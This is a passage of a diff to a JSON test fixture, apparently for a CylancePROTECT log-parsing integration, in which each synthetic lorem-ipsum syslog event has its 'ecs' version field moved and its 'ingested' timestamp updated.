Subclass:iusmo, SHA256:tame, MD5:naaliq", "event": { - "ingested": "2021-06-09T10:27:47.525844200Z" + "ingested": "2021-12-14T14:42:47.135070236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "19-October-2017 04:03:07 medium toccaec7645.www5.home psaqua \u003c\u003cullamcor\u003eitationu 2017-10-19T4:03:07.proident maliquam2147.internal.home CylancePROTECT lores ritati orisni Event Type: DeviceControl, Event Name: PolicyAdd, Device Name: estl, External Device Type: sitam, External Device Vendor ID: orem, External Device Name: rcit, External Device Product ID: llamco, External Device Serial Number: atu, Zone Names: untincul", "event": { - "ingested": "2021-06-09T10:27:47.525849Z" + "ingested": "2021-12-14T14:42:47.135070650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iuntNe 2017-11-2T11:05:41.atise tate6578.api.localdomain CylancePROTECT emvele isnost [olorem] Event Type: Threat, Event Name: PolicyAdd, Device Name: yCiceroi, IP Address: (10.252.165.146), File Name: iquamqua, Path: sit, Drive Type: rumSect, SHA256: ita, MD5: vitaed, Status: exeaco, Cylance Score: 51.523000, Found Date: mven, File Type: olorsit, Is Running: tore, Auto Run: elits, Detected By: consequa, Zone Names: turadip, Is Malware: tatevel, Is Unique To Cylance: boreetdo, Threat Classification: undeom", "event": { - "ingested": "2021-06-09T10:27:47.525853900Z" + "ingested": "2021-12-14T14:42:47.135071031Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-11-16T6:08:15.uov itlab6956.mail.local CylancePROTECT loremqu tetur amvo Event Type: siuta, Event Name: threat_changed, Device Name: ommodo, Agent Version: uptat, IP Address: (10.105.46.101, tatione), MAC Address: (01:00:5e:de:32:2c, ori), Logged On Users: (tconsect), OS: rum", 
"event": { - "ingested": "2021-06-09T10:27:47.525858500Z" + "ingested": "2021-12-14T14:42:47.135071418Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-12-1T1:10:49.ugiatn midestl1919.host CylancePROTECT cingel modocon [ipsu] Event Type: ntNeq, Event Name: Device Policy Assigned, Device Name: aUt, Agent Version: boNem, IP Address: (10.124.88.222), MAC Address: (01:00:5e:f9:78:c2), Logged On Users: (onu), OS: liquaUte", "event": { - "ingested": "2021-06-09T10:27:47.525863500Z" + "ingested": "2021-12-14T14:42:47.135071810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ria 2017-12-15T8:13:24.atDu nsec923.internal.local CylancePROTECT agnaaliq tlaboree norumet Event Type: ExploitAttempt, Event Name: DeviceEdit, Device Name: mod, IP Address: (10.28.120.149), Action: deny, Process ID: 3916, Process Name: tinvolup.exe, User Name: tsed, Violation Type: inv, Zone Names: rroq", "event": { - "ingested": "2021-06-09T10:27:47.525868100Z" + "ingested": "2021-12-14T14:42:47.135072194Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-12-29T3:15:58.mipsamvo eiusmod3517.internal.invalid CylancePROTECT oreveri ehende [eaqueip] Event Type: AuditLog, Event Name: ZoneAddDevice, Message: Device: olup; SHA256: labor, User: )dol (sciun metcons", "event": { - "ingested": "2021-06-09T10:27:47.525872800Z" + "ingested": "2021-12-14T14:42:47.135072583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "12-January-2018 22:18:32 high asnu3806.api.lan tamet \u003c\u003cperspici\u003eationul 2018/01/12T22:18:32.mquisn queips4947.mail.example CylancePROTECT molestia quir eavolup Event Type: AppControl, Event Name: Registration, Device Name: labore, 
IP Address: (10.165.16.231), Action: accept, Action Type: uto, File Path: iuntNequ, SHA256: esseq, Zone Names: aincidun", "event": { - "ingested": "2021-06-09T10:27:47.525877900Z" + "ingested": "2021-12-14T14:42:47.135073083Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "27-January-2018 05:21:06 low oloreseo5039.test derit \u003c\u003corese\u003edolor 2018-1-27T5:21:06.econs ntexpl3889.www.home CylancePROTECT yCic nder [mdolore] Event Type: Cic, Event Name: DeviceRemove, Device Name: saqu, Agent Version: iscive, IP Address: (10.156.34.19), MAC Address: (01:00:5e:54:ab:3f), Logged On Users: (imveni), OS: ariaturE Zone Names: stquid", "event": { - "ingested": "2021-06-09T10:27:47.525882600Z" + "ingested": "2021-12-14T14:42:47.135073458Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ree 2018-2-10T12:23:41.saquaea ation6657.www.home CylancePROTECT iatqu lorsi repreh Event Type: AuditLog, Event Name: Registration, Message: sitamet, User: utlabo tetur (tionula)", "event": { - "ingested": "2021-06-09T10:27:47.525887200Z" + "ingested": "2021-12-14T14:42:47.135073850Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "24-Feb-2018 7:26:15 very-high idolor3916.www5.home tas \u003c\u003cautfugi\u003etasun 24T19:26:15.duntutla ntium4450.www5.localdomain CylancePROTECT Event Name:DeviceRemove, Device Name:vol, Agent Version:oremquel, IP Address: (10.22.94.10), MAC Address: (01:00:5e:ee:e8:77), Logged On Users: (ssusci), OS:animid, Zone Names:mpo", "event": { - "ingested": "2021-06-09T10:27:47.525902800Z" + "ingested": "2021-12-14T14:42:47.135074237Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llam 2018-3-11T2:28:49.cti 
aparia1179.www.localdomain CylancePROTECT rever ore offici Event Type: AuditLog, Event Name: DeviceEdit, Message: Devices: metco, User: acom ceroinB (nim)", "event": { - "ingested": "2021-06-09T10:27:47.525909700Z" + "ingested": "2021-12-14T14:42:47.135074613Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "25-March-2018 09:31:24 medium taliqui5348.mail.localdomain loremag \u003c\u003ctcu\u003eiatqu 2018-3-25T9:31:24.inBCSedu erspi5757.local CylancePROTECT suntex iacons [occaec] Event Type: DeviceControl, Event Name: LoginSuccess, Device Name: uov, External Device Type: quaeab, External Device Vendor ID: fici, External Device Name: imve, External Device Product ID: quide, External Device Serial Number: quaU, Zone Names: undeomni", "event": { - "ingested": "2021-06-09T10:27:47.525915100Z" + "ingested": "2021-12-14T14:42:47.135075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "liquid 2018-4-8T4:33:58.enim Finibus1411.www5.corp CylancePROTECT xea taed umdolo Event Type: AuditLog, Event Name: fullaccess, Message: Policy Assigned:rroqu; Devices: dquiaco , User: nibus vitaed (ser)", "event": { - "ingested": "2021-06-09T10:27:47.525920100Z" + "ingested": "2021-12-14T14:42:47.135075388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Apr 22 11:36:32 upt7879.www5.example CylancePROTECT Event Type:idolo, Event Name:threat_found, Device Message: Device: edolo; Zones Removed: ugiatquo; Zones Added: ntium, User: uptate lloinven (econs), Zone Names:lmolesti Device Id: apariatu", "event": { - "ingested": "2021-06-09T10:27:47.525925Z" + "ingested": "2021-12-14T14:42:47.135075798Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 
2018/05/07 06:39:06 erspi4926.www5.test CylancePROTECT Event Type: AppControl, incidid quin [autemv] Event Type: AppControl, Event Name: PolicyAdd, Device Name: fugits, IP Address: (10.153.34.43), Action: allow, Action Type: acommo, File Path: isi, SHA256: culpaq, Zone Names: saute", "event": { - "ingested": "2021-06-09T10:27:47.525930Z" + "ingested": "2021-12-14T14:42:47.135076243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-5-21T1:41:41.abor magnid3343.home CylancePROTECT tesseq niam [pernat] Event Type: DeviceControl, Event Name: threat_found, Device Name: gitse, External Device Type: ugitse, External Device Vendor ID: quiineav, External Device Name: billoinv, External Device Product ID: sci, External Device Serial Number: col, Zone Names: obea", "event": { - "ingested": "2021-06-09T10:27:47.525935200Z" + "ingested": "2021-12-14T14:42:47.135076632Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "4-Jun-2018 8:44:15 high uptatem4483.localhost inrepr \u003c\u003cmol\u003eumdolors 4T20:44:15.dolori asperna7623.www.home CylancePROTECT Event Name:ThreatUpdated, Message: Device:dexewas auto assigned to Zone:tat, User:onproide", "event": { - "ingested": "2021-06-09T10:27:47.525940100Z" + "ingested": "2021-12-14T14:42:47.135077019Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riosa 2018-6-19T3:46:49.tNe pisc3553.internal.home CylancePROTECT rautod olest eataev Event Type: ExploitAttempt, Event Name: DeviceEdit, Device Name: ritati, IP Address: (10.43.110.203), Action: allow, Process ID: 1359, Process Name: nim.exe, User Name: ame, Violation Type: amvolu, Zone Names: mip", "event": { - "ingested": "2021-06-09T10:27:47.525944800Z" + "ingested": "2021-12-14T14:42:47.135077405Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-July-2018 10:49:23 medium iame4937.local tiumd \u003c\u003cntmoll\u003emexer 2018/07/03T10:49:23.estla uipexe7153.api.corp CylancePROTECT saqu remips illoi Event Type: AppControl, Event Name: ZoneAdd, Device Name: abori, IP Address: (10.127.20.244), Action: block, Action Type: uelauda, File Path: ema, SHA256: odi, Zone Names: ptatems", "event": { - "ingested": "2021-06-09T10:27:47.525949400Z" + "ingested": "2021-12-14T14:42:47.135077801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nde 2018-7-17T5:51:58.abillo undeom845.www5.example CylancePROTECT quaer eetdo [tlab] Event Type: ScriptControl, Event Name: LoginSuccess, Device Name: liq, File Path: seddoeiu, Interpreter: nse, Interpreter Version: 1.3421, Zone Names: quira, User Name: tassita", "event": { - "ingested": "2021-06-09T10:27:47.525953900Z" + "ingested": "2021-12-14T14:42:47.135078204Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Aug 1 12:54:32 atis6201.internal.invalid CylancePROTECT Event Type:nisiut, Event Name:threat_changed, Message: Device:quirawas auto assigned to Zone:rror, User:tatema", "event": { - "ingested": "2021-06-09T10:27:47.525958400Z" + "ingested": "2021-12-14T14:42:47.135078609Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "15-August-2018 07:57:06 low tperspic7591.www.lan ict \u003c\u003csquirati\u003etem 2018-8-15T7:57:06.mestq ura675.mail.localdomain CylancePROTECT eleumiu uei Nequepo Event Type: DeviceControl, Event Name: DeviceRemove, Device Name: seddo, External Device Type: uam, External Device Vendor ID: orumSec, External Device Name: nisiuta, External Device Product ID: stiaecon, External Device Serial Number: 
dol, Zone Names: sumquiad", "event": { - "ingested": "2021-06-09T10:27:47.525963100Z" + "ingested": "2021-12-14T14:42:47.135078993Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "29-August-2018 14:59:40 high oeni179.api.localhost gna \u003c\u003cisiutali\u003elumqu 2018-8-29T2:59:40.onulamco ons5050.mail.test CylancePROTECT unt tass [tiumdol] Event Type: Threat, Event Name: threat_quarantined, Device Name: mquiad, IP Address: (10.48.209.115), File Name: psa, Path: nculpaq, Drive Type: reseosqu, SHA256: sequat, MD5: lor, Status: ccaec, Cylance Score: 75.498000, Found Date: ommo, File Type: iame, Is Running: laudanti, Auto Run: umiurer, Detected By: rere, Zone Names: cta, Is Malware: aevi, Is Unique To Cylance: uameiusm, Threat Classification: adm", "event": { - "ingested": "2021-06-09T10:27:47.525967800Z" + "ingested": "2021-12-14T14:42:47.135079386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "12-September-2018 22:02:15 medium mnihilm1903.internal.host ditautf \u003c\u003citametc\u003eori 2018-9-12T10:02:15.uamqu olori4584.mail.domain CylancePROTECT sunt autfugit emUte Event Type: AuditLog, Event Name: ThreatUpdated, Message: Zone: nturmag; Policy: tura; Value: osquirat, User: equat aliquid (usantiu)", "event": { - "ingested": "2021-06-09T10:27:47.525973400Z" + "ingested": "2021-12-14T14:42:47.135079768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "27-Sep-2018 5:04:49 very-high trudex4443.www5.localhost lor \u003c\u003cxplic\u003eeseruntm 27T05:04:49.lpaquiof oloreeu7597.mail.home CylancePROTECT Event Name:PolicyAdd, Device Name:nula, Agent Version:quiacons, IP Address: (10.7.99.47), MAC Address: (01:00:5e:e8:41:ae), Logged On Users: (evolupta), OS:teturadi, Zone Names:ditau", "event": { - "ingested": 
"2021-06-09T10:27:47.525978100Z" + "ingested": "2021-12-14T14:42:47.135080167Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hend 2018-10-11T12:07:23.eacommo ueip5847.api.test CylancePROTECT umd sciveli [dolorem] Event Type: sed, Event Name: Device Updated, Threat Class: Nemoenim, Threat Subclass: usm, SHA256: labori, MD5: porai", "event": { - "ingested": "2021-06-09T10:27:47.525982900Z" + "ingested": "2021-12-14T14:42:47.135080548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ostr 2018-10-25T7:09:57.sec uid3520.www.home CylancePROTECT eFini ectob [mrema] Event Type: ScriptControl, Event Name: SystemSecurity, Device Name: prehend, File Path: eufug, Interpreter: roquisq, Interpreter Version: 1.989 (est), Zone Names: civelits, User Name: ici", "event": { - "ingested": "2021-06-09T10:27:47.525987600Z" + "ingested": "2021-12-14T14:42:47.135080935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Nov 9 2:12:32 miurerep3693.mail.localhost CylancePROTECT Event Type:iduntu, Event Name:SyslogSettingsSave, Device Name:inibusB, Zone Names:nostrud", "event": { - "ingested": "2021-06-09T10:27:47.525992400Z" + "ingested": "2021-12-14T14:42:47.135081312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Nov 23 9:15:06 esse3795.www.host CylancePROTECT Event Type:pariatur, Event Name:SyslogSettingsSave, Message: The Device:imaveniawas auto assigned to Zone:expli, User:ugiat", "event": { - "ingested": "2021-06-09T10:27:47.525997100Z" + "ingested": "2021-12-14T14:42:47.135081704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "bore 2018-12-7T4:17:40.ptate 
teir7585.www5.localdomain CylancePROTECT quu xeac [llitanim] Event Type: AuditLog, Event Name: SystemSecurity, Message: Devices: oreverit, User: scip Finibus (Utenimad)", "event": { - "ingested": "2021-06-09T10:27:47.526001600Z" + "ingested": "2021-12-14T14:42:47.135082095Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Dec 21 11:20:14 hen1901.example CylancePROTECT Event Type:ali, Event Name:SyslogSettingsSave, Device Name:quunt, External Device Type:itasp, External Device Vendor ID:qui, External Device Name:equeporr, External Device Product ID:met, External Device Serial Number:volup, Zone Names:ptate, Device Id: entsu, Policy Name: conse", "event": { - "ingested": "2021-06-09T10:27:47.526006700Z" + "ingested": "2021-12-14T14:42:47.135082600Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 5 6:22:49 mag4267.www.test CylancePROTECT Event Type:atura, Event Name:Alert, Device Message: Device: oreeu User: ),nvo (iamqui tassita Zone Names: colabori Device Id: imidestl", "event": { - "ingested": "2021-06-09T10:27:47.526011300Z" + "ingested": "2021-12-14T14:42:47.135082990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-1-19T1:25:23.minimve serrorsi1096.www5.localdomain CylancePROTECT lamco cit [siar] Event Type: AuditLog, Event Name: ZoneAddDevice, Message: The Device: reetdo was auto assigned to the Zone: IP Address: Fake Devices, User: ()ever", "event": { - "ingested": "2021-06-09T10:27:47.526016100Z" + "ingested": "2021-12-14T14:42:47.135083496Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quiav 2019-2-2T8:27:57.mse prehen4807.mail.invalid CylancePROTECT liqua ariatur [labo] Event Type: DeviceControl, Event 
Name: SystemSecurity, Device Name: remq, External Device Type: unt, External Device Vendor ID: tla, External Device Name: arch, External Device Product ID: lite, External Device Serial Number: ugia, Zone Names: meum", "event": { - "ingested": "2021-06-09T10:27:47.526020700Z" + "ingested": "2021-12-14T14:42:47.135084149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Feb 17 3:30:32 nvolupta126.www.domain CylancePROTECT Event Type:quas, Event Name:threat_found, Device Name:orp, File Path:ender, Interpreter:dico, Interpreter Version:1.5848, Zone Names:Utenima, User Name: olore", "event": { - "ingested": "2021-06-09T10:27:47.526025500Z" + "ingested": "2021-12-14T14:42:47.135084658Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-March-2019 10:33:06 medium radip4253.www.corp gna \u003c\u003cici\u003equamnih 2019-3-3T10:33:06.asnulap yCiceroi5998.mail.home CylancePROTECT inc tect uiad Event Type: DeviceControl, Event Name: DeviceRemove, Device Name: roinBCSe, External Device Type: maperiam, External Device Vendor ID: mSec, External Device Name: smoditem, External Device Product ID: tatisetq, External Device Serial Number: uidolo, Zone Names: umdolore", "event": { - "ingested": "2021-06-09T10:27:47.526030500Z" + "ingested": "2021-12-14T14:42:47.135085266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-3-17T5:35:40.abori sit1400.www.lan CylancePROTECT ames amni [tatio] Event Type: AuditLog, Event Name: ZoneAdd, Message: Zone: ntsunti; Policy: borios; Value: ani, User: uid idatat (onev)", "event": { - "ingested": "2021-06-09T10:27:47.526035200Z" + "ingested": "2021-12-14T14:42:47.135085659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - 
}, "message": "iosamni 2019-4-1T12:38:14.idu sis3986.internal.lan CylancePROTECT tsedquia its umdolor Event Type: isiu, Event Name: Device Policy Assigned, Device Name: mmodi, Agent Version: snostr, IP Address: (10.232.90.3), MAC Address: (01:00:5e:e6:a6:a2), Logged On Users: (midestl), OS: nci", "event": { - "ingested": "2021-06-09T10:27:47.526039900Z" + "ingested": "2021-12-14T14:42:47.135086058Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hilmole 2019-4-15T7:40:49.sequ sectetu7182.localdomain CylancePROTECT dolor lorumwri [amnihil] Event Type: orissus, Event Name: Device Updated, uido", "event": { - "ingested": "2021-06-09T10:27:47.526044500Z" + "ingested": "2021-12-14T14:42:47.135086495Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-4-29T2:43:23.itse officiad4982.www5.domain CylancePROTECT lumqui quiavolu [upta] Event Type: AuditLog, Event Name: ZoneAdd, Message: Device: umtota; User: etdolore magnaa (sumquiad)", "event": { - "ingested": "2021-06-09T10:27:47.526049300Z" + "ingested": "2021-12-14T14:42:47.135086888Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-5-13T9:45:57.Duisa consequa1486.internal.localdomain CylancePROTECT aevitaed byCic [leumiur] Event Type: ptatemse, Event Name: pechange, Threat Class: quaeratv, Threat Subclass: involu, SHA256: tobeata, MD5: nesciun", "event": { - "ingested": "2021-06-09T10:27:47.526055500Z" + "ingested": "2021-12-14T14:42:47.135087276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onorumet 2019-5-28T4:48:31.ptatema eavolup6981.www5.example CylancePROTECT psaquaea rchit psumq Event Type: DeviceControl, Event Name: threat_changed, Device Name: lum, External 
Device Type: xerc, External Device Vendor ID: ctetura, External Device Name: msequ, External Device Product ID: nvol, External Device Serial Number: enimadmi, Zone Names: tateveli", "event": { - "ingested": "2021-06-09T10:27:47.526060700Z" + "ingested": "2021-12-14T14:42:47.135087661Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-6-11T11:51:06.oremip its6443.mail.example CylancePROTECT natuserr ostrudex [nse] Event Type: miurere, Event Name: fullaccess, Device Name: tlabo, Agent Version: tatemse, IP Address: (10.139.80.71), MAC Address: (01:00:5e:bc:c1:21), Logged On Users: (orem), OS: eniamqui", "event": { - "ingested": "2021-06-09T10:27:47.526065400Z" + "ingested": "2021-12-14T14:42:47.135088056Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "25-June-2019 18:53:40 high tnulapa7580.www.domain adeser \u003c\u003cuasiarc\u003edoeiu 2019-6-25T6:53:40.onsectet dentsunt6061.www5.home CylancePROTECT tobeata imven onnumqua Event Type: quioff, Event Name: SyslogSettingsSave, Device Names: (upt), Policy Name: atatnonp, User: nvol dtemp (mquis)", "event": { - "ingested": "2021-06-09T10:27:47.526074100Z" + "ingested": "2021-12-14T14:42:47.135088447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10-July-2019 01:56:14 medium midest133.www5.example tocca \u003c\u003corsitvol\u003entor 2019-7-10T1:56:14.oinBCSed oid218.api.invalid CylancePROTECT roquisqu ariat midestl Event Type: AuditLog, Event Name: SyslogSettingsSave, Message: mcorpori, User: mqu pteursi (orsitam)", "event": { - "ingested": "2021-06-09T10:27:47.526079400Z" + "ingested": "2021-12-14T14:42:47.135088852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "totamre 
2019-7-24T8:58:48.rpo velites4233.internal.home CylancePROTECT uisaute uun end Event Type: odocons, Event Name: Alert, Threat Class: asp, Threat Subclass: dexercit, SHA256: amn, MD5: itessequ", "event": { - "ingested": "2021-06-09T10:27:47.526084100Z" + "ingested": "2021-12-14T14:42:47.135089235Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "7-August-2019 16:01:23 low sumd3215.test aUtenima \u003c\u003cturQuis\u003etaevi 2019-8-7T4:01:23.uames tconsec7604.corp CylancePROTECT laboree udantiu [itametco] Event Type: Threat, Event Name: Alert, Device Name: stiaecon, IP Address: (10.223.246.244), File Name: itl, Path: ttenb, Drive Type: olor, SHA256: quiav, MD5: gna, Status: Nem, Cylance Score: 105.845000, Found Date: lors, File Type: oluptat, Is Running: enimad, Auto Run: tis, Detected By: qua, Zone Names: con, Is Malware: tore, Is Unique To Cylance: sequatD, Threat Classification: ercitati", "event": { - "ingested": "2021-06-09T10:27:47.526088700Z" + "ingested": "2021-12-14T14:42:47.135089626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "21-Aug-2019 11:03:57 high oeiusmo5035.api.local tconse \u003c\u003crem\u003etseddoei 21T23:03:57.teursint etMa3452.www5.test CylancePROTECT Event Name:threat_found, Device Name:nturmag, File Path:uredol, Interpreter:maliqua, Interpreter Version:1.4613, Zone Names:mquia, User Name: omnisi, Device Id: etMalor, Policy Name: mco", "event": { - "ingested": "2021-06-09T10:27:47.526093300Z" + "ingested": "2021-12-14T14:42:47.135090018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "5-September-2019 06:06:31 high taspe1205.mail.domain cti \u003c\u003commodoc\u003ense 2019-9-5T6:06:31.mveniam tuser2694.internal.invalid CylancePROTECT tlaboru aeabillo [ciad] Event Type: ugiatqu, 
Event Name: threat_found, Device Names: (turveli), Policy Name: isciv, User: natus boreet (luptasnu)", "event": { - "ingested": "2021-06-09T10:27:47.526097800Z" + "ingested": "2021-12-14T14:42:47.135090401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edqu 2019-9-19T1:09:05.tationu gnaaliq5240.api.test CylancePROTECT nula ameaquei [gnama] Event Type: esciun, Event Name: pechange, Threat Class: ratvo, Threat Subclass: ntutl, SHA256: volupt, MD5: ine", "event": { - "ingested": "2021-06-09T10:27:47.526102500Z" + "ingested": "2021-12-14T14:42:47.135090782Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-Oct-2019 8:11:40 low ditaut33.mail.localhost iumdo \u003c\u003coreeu\u003emea 3T20:11:40.ssec illum2625.test CylancePROTECT Event Name:LoginSuccess, Threat Class:iaeconse, Threat Subclass:uisa, SHA256:nimadmin, MD5:tdolo", "event": { - "ingested": "2021-06-09T10:27:47.526107100Z" + "ingested": "2021-12-14T14:42:47.135091171Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "18-October-2019 03:14:14 high porissus1225.www5.corp ddoe \u003c\u003cuptateve\u003eured 2019-10-18T3:14:14.ctetu oreeu6419.www.corp CylancePROTECT cul iinea snos Event Type: AuditLog, Event Name: PolicyAdd, Message: Device: moenimip; User: uames tium (ianonn)", "event": { - "ingested": "2021-06-09T10:27:47.526111700Z" + "ingested": "2021-12-14T14:42:47.135091564Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-11-1T10:16:48.tiset sci333.mail.home CylancePROTECT doloreeu lors eumfu Event Type: docons, Event Name: PolicyAdd, Device Names: (eumf), Policy Name: roquisq, User: uasi maveniam (uis)", "event": { - "ingested": "2021-06-09T10:27:47.526116100Z" 
+ "ingested": "2021-12-14T14:42:47.135091953Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "imi 2019-11-15T5:19:22.animi edutpers6452.api.host CylancePROTECT ntiumt sumquia vento Event Type: sitv, Event Name: LoginSuccess, Threat Class: com, Threat Subclass: rep, SHA256: mveni, MD5: aquae", "event": { - "ingested": "2021-06-09T10:27:47.526120900Z" + "ingested": "2021-12-14T14:42:47.135092410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "30-November-2019 00:21:57 low iaturE3103.api.domain aturve \u003c\u003cptateve\u003eiatu 2019/11/30T00:21:57.use nulamc5617.mail.host CylancePROTECT teturad ese [eddoei] Event Type: AppControl, Event Name: SystemSecurity, Device Name: ntu, IP Address: (10.134.137.205), Action: deny, Action Type: duntut, File Path: emporin, SHA256: oreseosq, Zone Names: etquasia", "event": { - "ingested": "2021-06-09T10:27:47.526125500Z" + "ingested": "2021-12-14T14:42:47.135092796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-12-14T7:24:31.cinge tatem4713.internal.host CylancePROTECT elites pariat [nimip] Event Type: AuditLog, Event Name: threat_found, Message: Zone: usci; Policy: unturmag; Value: dexeaco, User: lupta ura (oreeufug)", "event": { - "ingested": "2021-06-09T10:27:47.526130400Z" + "ingested": 